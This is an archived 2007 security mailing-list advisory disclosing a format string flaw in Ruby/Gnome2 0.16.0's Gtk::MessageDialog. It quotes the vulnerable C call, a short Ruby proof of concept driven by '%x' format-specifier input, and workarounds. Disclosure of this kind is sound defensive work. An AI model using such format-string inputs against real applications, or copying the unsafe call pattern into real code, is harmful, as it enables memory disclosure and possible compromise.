Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Ruby/Gnome2 0.16.0 Format String Vulnerability

from [chris . rohlf] Network Security [Permanent Link]
Subject: Ruby/Gnome2 0.16.0 Format String Vulnerability
Date: 27 Nov 2007 12:16:58 -0000 
RubyGnome2 0.16.0
Format String Vulnerability In Gtk::MessageDialog
http://em386.blogspot.com

Ruby Gnome2 is a project to provide GTK2 bindings to ruby scripts so you can 
write GUI code in less time. There is a format string vulnerability in 
Gtk::MessageDialog(). This design flaw does not
allow for a user generated string to be safely sent to this function.

It is really just an API to the GTK2 function gtk_message_dialog_new() 
Ruby/Gnome2 does not properly use a format specifier for the message
variable in  ruby-gnome2-all-0.16.0/gtk/src/rbgtkmessagedialog.c as requested 
by the Gtk man page for this function.

...
w = gtk_message_dialog_new(NIL_P(parent) ? NULL : GTK_WINDOW(RVAL2GOBJ(parent)),
                             RVAL2GFLAGS(flags, GTK_TYPE_DIALOG_FLAGS),
                             RVAL2GENUM(type, GTK_TYPE_MESSAGE_TYPE),
                             RVAL2GENUM(buttons, GTK_TYPE_BUTTONS_TYPE),
                             (const gchar*)(NIL_P(message) ? "": 
RVAL2CSTR(message)));
...

The GTK2 documentation:
http://www.gtk.org/api/2.6/gtk/GtkMessageDialog.html#gtk-message-dialog-new
states that message should be a 'printf style format string' and after that 
should be arguments to message. However calling messagedialog from your ruby 
script does not support this.

The vulnerability can be exploited by sending a specially crafted string to the 
function. An example ruby program is provided as a POC.

...
#!/usr/bin/env ruby
# ruby rubber.rb %x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x

require 'libglade2'

my_string = ARGV[0]

dialog = Gtk::MessageDialog.new(@main_app_window, Gtk::Dialog::MODAL, 
                                      Gtk::MessageDialog::INFO, 
                                      Gtk::MessageDialog::BUTTONS_CLOSE,
                                      "%s - Was your string!" % my_string)
      dialog.run
      dialog.destroy
...

A temporary work around for this vulnerability is using the markup member:

dialog.markup = "#{my_string} - Was your string!"

Or 

my_string = "my_string = my_string.gsub(/%/, "%%")

I have found a few ruby/gnome2 apps out there who use the API in this unsafe 
manner. 

Fixed Nov 27th 2007 in Ruby/Gnome2 SVN
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • Ruby/Gnome2 0.16.0 Format String Vulnerability, chris . rohlf <=
Previous by Date:  [security bulletin] HPSBUX02251 SSRT071449 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning, security-alert
Next by Date:  Eurologon CMS Multiple SQL Injection, kingoftheworld92
Previous by Thread:  [security bulletin] HPSBUX02251 SSRT071449 rev.3 - HP-UX Running BIND, Remote DNS Cache Poisoning, security-alert
Next by Thread:  Eurologon CMS Multiple SQL Injection, kingoftheworld92
Indexes:  [Date] [Thread] [Top] [All Lists]